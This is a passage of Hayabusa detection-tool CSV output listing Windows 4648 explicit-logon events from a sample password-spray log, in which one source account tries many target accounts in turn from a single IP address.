Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:22.487 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:23.577 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:24.660 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:25.732 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:26.794 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:27.863 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:28.925 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:29.993 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:31.050 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:32.142 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:33.206 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:34.265 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:35.340 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:36.403 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:37.453 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:38.533 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:39.613 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:40.691 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:41.769 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:42.852 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:43.922 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:44.998 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:46.080 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:47.159 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:48.237 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:49.314 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:50.388 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:51.455 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:52.532 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:53.613 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:54.668 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:55.714 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:56.768 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:57.850 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:58.920 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:00.029 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:01.113 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:02.172 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:03.238 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:04.300 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:05.378 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:06.439 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:07.513 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:08.581 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:09.674 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:10.754 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:11.843 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:12.917 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:13.987 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:15.045 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:16.136 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:17.201 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:18.302 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:19.372 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:20.450 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:21.552 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:22.656 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:23.749 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:24.832 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:25.919 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:26.998 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:28.103 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:29.187 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:30.262 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:31.362 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:32.419 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:33.499 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:34.577 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:35.670 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:36.716 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:37.815 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:38.872 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:39.954 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:41.028 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:42.075 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:43.142 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:44.208 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:45.284 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:46.379 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:47.433 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:48.512 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:49.576 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:50.656 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:51.729 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:52.823 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:53.886 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:54.942 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : 